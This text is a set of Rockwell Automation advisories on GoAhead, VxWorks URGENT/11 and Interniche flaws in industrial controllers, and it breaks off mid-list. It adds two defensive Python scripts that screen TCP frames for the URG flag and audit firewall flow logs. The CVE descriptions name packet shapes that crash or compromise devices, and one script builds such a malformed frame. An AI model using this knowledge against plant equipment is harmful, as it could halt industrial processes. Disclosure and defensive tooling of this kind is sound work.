Version 1.2 – January 21, 2021: Updated Suggested Actions To Mitigate

Executive Summary

Rockwell Automation received a report from Cisco® Talos™ Researchers regarding two vulnerabilities in the 1783-NATR. If successfully exploited, these vulnerabilities may result in remote code execution on the device through the GoAhead web server and a denial-of-service condition.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Detailed Information

CVE-2019-5096: GoAhead web server allows unauthenticated HTTP requests that may result in remote code execution

A remote, unauthenticated attacker may be able to send a specially crafted HTTP request that leads to a use-after-free condition during processing of that request. The condition can be used to corrupt heap structures, which could allow the attacker to achieve remote code execution.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-5097: GoAhead web server allows specially crafted HTTP requests that may result in a denial-of-service for the device.

A remote, unauthenticated attacker may be able to send a specially crafted HTTP request that leads to an infinite loop in the process. The request can be unauthenticated, in the form of a GET or POST request, and does not require that the requested resource exist on the server, which would lead to a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5/10 [High]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Products

1783-NATR version 1.005

Risk Mitigation & User Action

Customers using the affected 1783-NATR are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability | Suggested Actions
CVE-2019-5096 | Upgrade firmware to version 1.006 to mitigate this vulnerability.
CVE-2019-5097 | Upgrade firmware to version 1.006 to mitigate this vulnerability.

General Security Guidelines

Network-based vulnerability mitigations for embedded products

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic to HTTP port 80 from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, that may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to port 80 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General mitigations

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/security notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • NVD - CVE-2019-5096 (nist.gov)
  • NVD - CVE-2019-5097 (nist.gov)

Critical
PN1494 | VxWorks Vulnerabilities affect Programmable Automation Controllers, EtherNet/IP Communication Modules, I/O Modules, Kinetix 6500 Servo Drive, High-Frequency RFID Interface Block
Published Date:
August 11, 2021
Last Updated:
October 04, 2024
CVE IDs:
CVE-2019-12260, CVE-2019-12265, CVE-2019-12257, CVE-2019-12258, CVE-2019-12256, CVE-2019-12255, CVE-2019-12263, CVE-2019-12262, CVE-2019-12264, CVE-2019-12261, CVE-2019-12259
Products:
Network Address Translation (NAT) Device, 5069 Compact I/O, 1732E ArmorBlock I/O, Ethernet/IP Connected Products, High-Frequency RFID, 1756 ControlLogix I/O
CVSS Scores (v3.1):
9.8, 8.8, 7.5, 8.1, 6.3, 7.1, 5.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
October 1, 2024 – Version 1.6. Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module.
02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions.
11-November-2020 - Version 1.3. Corrected suggested actions.
16-November-2019 - Version 1.2. Updated Advisory.
30-July-2019 - Version 1.0. Initial Release.

Revision History
Revision Number
1.1
Revision History
09-October-2019 - Updated Advisory

On October 1st, 2019, it was reported (ICS-CERT Advisory: ICSA-19-274-01) that the series of TCP/IP stack vulnerabilities originally reported as impacting VxWorks systems were now found to impact additional real-time operating system vendors, including ENEA, Green Hills Software, ITRON, and IP Infusion. Rockwell Automation is not aware of any products affected by the new advisory. An investigation is ongoing and this advisory will be updated when the investigation is complete.

Revision History
Revision Number
1.2
Revision History
16-November-2019 - Updated Advisory

Rockwell Automation completed an investigation into the additional impacted real-time operating systems reported in ICS-CERT Advisory ICSA-19-274-01 and concluded that no products are affected by this new advisory.

Revision History
Revision Number
1.3
Revision History
2-November-2020. Corrected suggested actions.

The Rockwell Automation PSIRT has updated the suggested actions for the ControlLogix 5580 and CompactLogix. Please refer to the Risk Mitigation & User Action section below for more information.

Revision History
Revision Number
1.4
Revision History
02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions.

The Rockwell Automation PSIRT has updated the suggested actions for the ControlLogix 5580, GuardLogix 5580, CompactLogix 5380, and Compact GuardLogix 5380. Please refer to the Risk Mitigation & User Action section below for more information.

Revision History
Revision Number
1.5
Revision History
04-August-2021 – Version 1.5. Updated firmware available for 1747-AENTR and 1769-AENTR.

Revision History
Revision Number
1.6
Revision History
October 1, 2024 – Version 1.6. Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module.

Executive Summary

Armis, an Internet of Things (IoT) security firm, reported a total of eleven vulnerabilities to WindRiver that affect VxWorks, a real-time operating system (RTOS) utilized by many different technology vendors, including Rockwell Automation™. These vulnerabilities, if successfully exploited, may result in several impacts ranging from packet information disclosure to allowing a threat actor to execute arbitrary code on the targeted device.

Not every VxWorks vulnerability applies to every impacted product family. Please see the table under Affected Products for a full list of the potentially affected Rockwell Automation products and the corresponding VxWorks vulnerabilities, which are identified by their Common Vulnerabilities and Exposures (CVE) ID.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures are provided herein.

Affected Products

In the table below, x marks a catalog number affected by the CVE in that column and - marks one that is not affected.

Product Family | Catalogs | CVE-2019-12255 | CVE-2019-12256 | CVE-2019-12257 | CVE-2019-12258 | CVE-2019-12259 | CVE-2019-12260 | CVE-2019-12261 | CVE-2019-12262 | CVE-2019-12263 | CVE-2019-12264 | CVE-2019-12265
CompactLogix™ 5480 (EPIC controller) | 5069-L4 | - | x | - | x | - | x | x | x | x | x | x
Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | - | x | - | x | - | x | x | x | x | x | x
ControlLogix® 5580 (+ GuardLogix®) | 1756-L8 | - | x | - | x | - | x | x | x | x | x | x
CompactLogix Compact GuardLogix 5380 | 5069-L3, 5069-L3S2 | - | x | - | x | - | x | x | x | x | x | x
CompactLogix 5370 | 1769-L3 | x | - | x | x | - | - | x | x | x | x | x
CompactLogix GuardLogix 5370 | 1769-L3S | x | - | x | x | - | - | x | x | x | x | x
CompactLogix 5370 | 1769-L2 | x | - | x | x | - | - | x | x | x | x | x
CompactLogix 5370 | 1769-L1 | x | - | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2TSC/A | x | - | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2TSC/B | x | x | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2T/C | x | - | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2T/D | x | x | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN4TR | - | x | - | x | - | x | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2TP/A | x | x | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2TR/B | x | - | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2TR/C | x | x | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN3TR/A | x | x | x | x | - | - | x | - | - | - | -
ControlLogix EtherNet/IP Module | 1756-EN3TR/B | x | x | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2F/B | x | x | x | x | - | - | x | - | - | - | -
ControlLogix EtherNet/IP Module | 1756-EN2F/C | x | x | x | x | - | - | x | x | x | x | x
ControlLogix EtherNet/IP Module | 1756-EN2TRXT | x | - | x | x | - | - | x | x | x | x | x
1783-NATR, Network Address Translation Router | 1783-NATR | - | x | - | x | - | x | x | x | x | x | x
ArmorBlock® I/O Modules | 1732E-8CFGM8R | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-IB8M8SOER | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-IF4M12R | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-IR4M12R | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-IT4M12R | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-OB8M8SR | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-OF4M12R | x | - | x | x | - | - | x | x | x | x | x
ArmorBlock I/O Modules | 1732E-8IOLM12R | - | x | - | x | - | x | x | x | x | x | x
Bulletin 56RF High-Frequency RFID | 56RF-IN-IPD22 | x | - | x | x | - | - | x | x | x | x | x
Bulletin 56RF High-Frequency RFID | 56RF-IN-IPD22A | x | - | x | x | - | - | x | x | x | x | x
Bulletin 56RF High-Frequency RFID | 56RF-IN-IPS12 | x | - | x | x | - | - | x | x | x | x | x
SLC™ 500 EtherNet/IP Adapter | 1747-AENTR | x | - | x | x | - | - | x | x | x | x | x
CompactLogix E/IP Adapter | 1769-AENTR | x | - | x | x | - | - | x | x | x | x | x
Kinetix® 6200 Servo Multi-axis Drives | 2094-SE02F-M00-Sx | x | - | x | x | - | - | x | x | x | x | x
Kinetix® 6500 Servo Multi-axis Drives | 2094-EN02D-M01-Sx | x | - | x | x | - | - | x | x | x | x | x

Vulnerability Details

Vulnerability #1: TCP Urgent Pointer = 0 leads to integer underflow
A remote, unauthenticated threat actor could either hijack an existing TCP session or establish a new TCP session to inject malformed TCP packets to the device, resulting in a denial of service condition to the application, or could allow the execution of arbitrary code on the affected device. Products implementing non-executable memory mitigations reduce the risk of exploitation.

CVE-2019-12255 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #2: Stack overflow in the parsing of IPv4 packets’ IP options
A remote, unauthenticated threat actor could send invalid IPv4 packets, resulting in a crash to the task that receives or transmits any Ethernet packets, or could allow the execution of arbitrary code on the affected device.

CVE-2019-12256 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #3: Heap overflow in DHCP Offer/ACK parsing inside ipdhcpc
A remote, unauthenticated threat actor could utilize this vulnerability to overwrite the heap, which may result in a crash later on when a task requests memory from the heap.

CVE-2019-12257 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #4: Denial of Service (DoS) of TCP connection via malformed TCP options
A remote, unauthenticated threat actor who is able to figure out the source and destination TCP port and IP addresses of a session could potentially inject invalid TCP segments which cause the TCP session to be reset, resulting in a crash of the application that is reading from the affected socket.

CVE-2019-12258 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned.

Vulnerability #5: DoS via NULL dereference in IGMP parsing
An unauthenticated threat actor on the same Local Area Network (LAN) as the victim system may use this vulnerability to cause a Denial of Service condition to the task that receives and transmits Ethernet packets.

CVE-2019-12259 has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been assigned.

Vulnerability #6: TCP Urgent Pointer state confusion caused by malformed TCP AO option
A threat actor could utilize this vulnerability to cause a buffer overflow, resulting in a crash of the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12260 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #7: TCP Urgent Pointer state confusion during connect() to a remote host
A threat actor could utilize this vulnerability to cause a buffer overflow, resulting in a crash of the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12261 has been assigned to this vulnerability. Rockwell Automation evaluated the vulnerability using the Common Vulnerability Scoring System (“CVSS”) v3.0. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #8: Handling of unsolicited Reverse Address Resolution Protocol (ARP) replies
A threat actor on the same LAN as the victim system can send reverse-ARP responses to the victim system and assign IPv4 addresses to the target, which could potentially result in network connectivity issues if any of the ARP values collide.

CVE-2019-12262 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #9: TCP Urgent Pointer state confusion due to race condition
A threat actor could utilize this vulnerability to cause a buffer overflow, resulting in a crash of the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12263 has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been assigned.

Vulnerability #10: Logical flaw in IPv4 assignment by the ipdhcpc DHCP client
A threat actor on the same LAN as the victim system could hijack a DHCP client session which may result in the victim incorrectly assigning a multicast IP address that originated from the threat actor.

CVE-2019-12264 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #11: IGMP information leak via IGMPv3 specific membership report
This vulnerability may allow a threat actor on the same LAN as the victim system to transmit packets to the network that may contain information from packets that were previously sent/received by the network stack.

CVE-2019-12265 has been assigned to this vulnerability. A CVSS v3 base score of 5.4 has been assigned.

Risk Mitigation & User Action

Customers using affected products are encouraged to evaluate their risk and, when possible, combine the risk mitigation strategies provided below with the general security guidelines.

  1. Ensure all devices are placed behind an external firewall and add a rule to drop or block any TCP segment where the “URG-flag” is set.
  2. Take the suggested actions for the products in the table below:
Product | Catalog Numbers | Suggested Actions
CompactLogix™ 5480 (EPIC Controller) | 5069-L4 | Upgrade to firmware version 32.013 (Download) or later.
Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | Will not be patched. Suggested action is to migrate to the 5069-AENTR.
ControlLogix EtherNet/IP Module | 1756-EN2TSC/A, 1756-EN2TSC/B | Will not be patched as it has been discontinued.
ControlLogix EtherNet/IP Module | 1756-EN2T/D, 1756-EN2TP/A, 1756-EN2TR/C, 1756-EN2F/C, 1756-EN4TR, 1756-EN3TR/B | Upgrade to firmware version 11.002 (Download) or later. (1756-EN4TR only) Upgrade to firmware version 3.001 (Download) or later.
ControlLogix EtherNet/IP Module | 1756-EN2T/C, 1756-EN2F/B, 1756-EN2TR/B, 1756-EN3TR/A | No fix. Upgrade to 1756-EN2T/D, 1756-EN2TP/A, 1756-EN2TR/C, 1756-EN2F/C, 1756-EN4TR, or 1756-EN3TR/B.
ControlLogix 5580 | 1756-L8 | Upgrade to firmware version 30.015 (Download), version 31.013 (Download), or version 32.013 (Download) or later.
GuardLogix 5580 | 1756-L8S | Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later.
CompactLogix 5380 | 5069-L3 | Upgrade to firmware version 30.015 (Download), version 31.013 (Download), or version 32.013 (Download) or later.
Compact GuardLogix 5380 | 5069-L3S2 | Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later.
CompactLogix 5370 | 1769-L3, 1769-L2, 1769-L1 | Upgrade to firmware version 32.013 (Download) or later.
CompactLogix GuardLogix 5370 | 1769-L3S | Upgrade to firmware version 28.015 (Download) or version 32.013 (Download) or later.
1783-NATR, Network Address Translation Router | 1783-NATR | Upgrade to firmware version 1.005 (Download) or later.
Kinetix® 6200 Servo Multi-axis Drives | 2094-SE02F-M00-Sx | Upgrade to firmware version 1.050 (Download) or later.
Kinetix® 6500 Servo Multi-axis Drives | 2094-EN02D-M01-Sx | Upgrade to firmware version 3.005 (Download) or later.
SLC 500 EtherNet/IP Adapter | 1747-AENTR | Upgrade to firmware version 2.003 (Download) or later.
CompactLogix E/IP Adapter | 1769-AENTR | Upgrade to firmware version 1.002 (Download) or later.
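
The following Python script is an added illustration of the firewall rule in step 1 above (drop or block any TCP segment where the URG flag is set); it is not Rockwell Automation code and is not part of the original advisory. It parses raw IPv4/TCP frames, applies that rule, and separately flags the "URG set with Urgent Pointer = 0" shape named under Vulnerability #1 (CVE-2019-12255), so a defender can check a capture or a test feed against the rule offline before relying on it at the zone boundary. The frames, addresses, ports and function names are all the example's own constructed assumptions; checksums are left at zero because nothing here is transmitted.

```python
"""Screen raw IPv4/TCP frames for the URG flag the advisory's firewall rule drops.

Added example, not vendor code. Sample frames are constructed inline; IP/TCP
checksums are left at zero because they are never put on the wire.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

IPPROTO_TCP = 6
TCP_FLAG_URG = 0x20  # bit 5 of the 9-bit TCP flags field


@dataclass(frozen=True)
class TcpSegment:
    src_port: int
    dst_port: int
    flags: int
    urgent_pointer: int

    @property
    def urg_set(self) -> bool:
        return bool(self.flags & TCP_FLAG_URG)


def parse_ipv4_tcp(frame: bytes) -> Optional[TcpSegment]:
    """Return the TCP header fields of an IPv4 frame, or None when the frame is
    not IPv4/TCP or is too short to hold a full IPv4 header plus 20-byte TCP header."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4  # IPv4 header length in bytes (options included)
    if ihl < 20 or frame[9] != IPPROTO_TCP or len(frame) < ihl + 20:
        return None
    src, dst, _seq, _ack, off_flags, _win, _csum, urg = struct.unpack(
        "!HHIIHHHH", frame[ihl:ihl + 20])
    return TcpSegment(src, dst, off_flags & 0x01FF, urg)


def should_drop(frame: bytes) -> bool:
    """The advisory's rule: drop any TCP segment with URG set.
    Frames that are not TCP are not matched by this rule and pass."""
    seg = parse_ipv4_tcp(frame)
    return seg is not None and seg.urg_set


def urg_with_zero_pointer(frame: bytes) -> bool:
    """The malformed shape behind CVE-2019-12255: URG set while Urgent Pointer is 0.
    Such a segment is already dropped by should_drop; this marks it for reporting."""
    seg = parse_ipv4_tcp(frame)
    return seg is not None and seg.urg_set and seg.urgent_pointer == 0


def audit(frames: List[bytes]) -> dict:
    """Summarise a batch of frames the way a rule hit counter would."""
    dropped = [i for i, f in enumerate(frames) if should_drop(f)]
    zero_ptr = [i for i, f in enumerate(frames) if urg_with_zero_pointer(f)]
    return {"total": len(frames), "dropped": dropped, "urg_zero_pointer": zero_ptr}


def build_ipv4_tcp(src_port: int, dst_port: int, flags: int,
                   urgent_pointer: int = 0, payload: bytes = b"") -> bytes:
    """Constructed sample frame: minimal 20-byte IPv4 header + 20-byte TCP header.
    Addresses 10.0.0.1 -> 10.0.0.2 are placeholders; checksums are zero."""
    tcp = struct.pack("!HHIIHHHH", src_port, dst_port, 1, 1,
                      (5 << 12) | (flags & 0x01FF), 8192, 0, urgent_pointer)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64,
                     IPPROTO_TCP, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return ip + tcp + payload


# Constructed sample batch: two ordinary segments, two that the rule should drop,
# and one UDP datagram that the TCP-only rule must leave alone.
SAMPLE_FRAMES = [
    build_ipv4_tcp(50000, 44818, flags=0x18),                    # PSH|ACK: passes
    build_ipv4_tcp(50001, 44818, flags=0x38, urgent_pointer=5),  # URG|PSH|ACK: dropped
    build_ipv4_tcp(50002, 2222, flags=0x30, urgent_pointer=0),   # URG|ACK, pointer 0: dropped and flagged
    bytes([0x45, 0x00, 0x00, 0x1C]) + b"\x00" * 5 + bytes([17]) + b"\x00" * 18,  # UDP: passes
]

if __name__ == "__main__":
    print(audit(SAMPLE_FRAMES))
```

The rule is deliberately coarse: it matches on the flag alone, not on the pointer value, because the advisory asks for every URG segment to be dropped regardless of how it is formed. `urg_with_zero_pointer` exists only so that hits matching the CVE-2019-12255 shape can be reported separately from ordinary URG traffic when reviewing a capture.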

 

 

General Security Guidelines

  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP ports 2222, 44818, 80, and 161 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation products, see Knowledgebase Article ID 898270.
  • Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Please recognize that VPN is only as secure as the connected devices.
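As an added illustration of the first guideline (this is not part of the advisory and not Rockwell Automation tooling), the Python below audits flow-log lines for traffic that was allowed to reach TCP/UDP 2222, 44818, 80 or 161 on a Manufacturing Zone host from an address outside that zone. The zone address range, the vendor-neutral log format and the log lines themselves are constructed for the example; substitute the real plant ranges and your firewall's export format.

```python
"""Audit firewall flow logs against the port guidance above (added example)."""
import ipaddress
import re

# Ports named in the guideline: EtherNet/IP (CIP) on 2222 and 44818, HTTP on 80, SNMP on 161.
RESTRICTED_PORTS = {2222: "EtherNet/IP (CIP)", 44818: "EtherNet/IP (CIP)", 80: "HTTP", 161: "SNMP"}

# Hypothetical Manufacturing Zone address space; replace with the real plant ranges.
MANUFACTURING_ZONE = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed, vendor-neutral flow-log format: ACTION PROTO SRC:SPORT -> DST:DPORT
FLOW_RE = re.compile(
    r"^(?P<action>ALLOW|DENY)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def in_zone(addr: str) -> bool:
    """True if the address falls inside one of the Manufacturing Zone networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in MANUFACTURING_ZONE)


def parse_flow(line: str):
    """Return a dict for one flow-log line, or None if the line does not match the format."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def audit_flows(lines):
    """Return flows that violate the guideline: traffic ALLOWED from outside the
    Manufacturing Zone into the zone on one of the restricted ports."""
    violations = []
    for line in lines:
        rec = parse_flow(line)
        if rec is None or rec["action"] != "ALLOW":
            continue
        if rec["dport"] in RESTRICTED_PORTS and not in_zone(rec["src"]) and in_zone(rec["dst"]):
            rec["service"] = RESTRICTED_PORTS[rec["dport"]]
            violations.append(rec)
    return violations


# Constructed sample log lines (not captured from any real network).
SAMPLE_LOG = [
    "ALLOW TCP 10.20.3.15:50123 -> 10.20.1.10:44818",    # zone-internal CIP traffic: fine
    "ALLOW TCP 192.168.50.7:41000 -> 10.20.1.10:44818",  # enterprise host reaching a controller: violation
    "DENY  UDP 192.168.50.7:41001 -> 10.20.1.10:2222",   # blocked as intended
    "ALLOW UDP 172.16.9.4:39000 -> 10.20.1.22:161",      # SNMP from outside the zone: violation
    "ALLOW TCP 192.168.50.9:41100 -> 10.20.1.22:80",     # HTTP from outside the zone: violation
    "ALLOW TCP 192.168.50.9:41101 -> 192.168.50.20:80",  # outside-to-outside: not in scope
]

if __name__ == "__main__":
    for v in audit_flows(SAMPLE_LOG):
        print(f"{v['src']} -> {v['dst']}:{v['dport']} ({v['service']}) allowed from outside the zone")
```

Only ALLOW records are reported, so the audit measures what the firewall actually let through rather than what it was asked to block; a DENY on the same ports confirms the rule is working.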

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (secure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • URGENT/11 General Overview, Technical Overview – Armis
  • Security Vulnerability Response Information – WindRiver
  • ICS-ADVISORY (ICSA-19-274-01) - Interpeak IPnet TCP/IP Stack

 

High
PN1575 | PN1575 | Interniche Vulnerabilities present in Rockwell Automation Products – “INFRA:HALT”
Published Date:
August 09, 2021
Last Updated:
August 09, 2021
CVE IDs:
CVE-2020-25767, CVE-2020-35684, CVE-2020-35685, CVE-2021-31400, CVE-2021-36762, CVE-2020-25926, CVE-2021-31226, CVE-2021-31401, CVE-2021-31228, CVE-2020-25928, CVE-2020-25927, CVE-2021-31227, CVE-2020-27565, CVE-2020-35683
Products:
AADvance, 1715 Distributed I/O, 1715 Redundant I/O, ArmorStart
CVSS Scores:
8.2, 4.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 – August 9, 2021

Executive Summary

Rockwell Automation received a report from CERT/CC with research done by Forescout Technologies and Vdoo regarding fourteen vulnerabilities in the products listed below. If successfully exploited, these vulnerabilities may result in the products faulting and/or ceasing communications, requiring the power to be cycled to the product to recover.

Customers using affected versions of these products are encouraged to evaluate the mitigations provided below and apply them to their deployed products. Additional details relating to the discovered vulnerabilities, including affected products and recommended countermeasures, are provided below.

Affected Products

20-COMM-ER All Versions
ArmorStart 28xE All Versions
1715-AENTR All Versions
AADvance Safety Controller All Versions
AADvance Eurocard Controllers All Versions

Vulnerability Details

CVE-2020-25767: Malformed DNS Response could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to form a malformed response to a DNS request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-25928: Malformed DNS Response could cause a device to fault due to a heap overflow.

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in a heap-buffer overflow resulting in a possible information leak, remote code execution, or the device to fault and/or cease communications requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 9.8/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


CVE-2020-25927: Malformed DNS Response could cause a device to fault.

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in an Out-of-Bounds read resulting in a device fault and/or cessation of communications requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 8.2/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H


CVE-2020-25926: Insufficiently randomized transaction IDs could facilitate DNS cache poisoning attacks

A REMOTE, UNAUTHENTICATED attacker may be able to poison the DNS cache of the device due to transaction IDs not being properly randomized.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N


CVE-2020-27565: Malformed HTTP request could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-35683: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-35684: Malformed ICMP packet could cause a device to fault

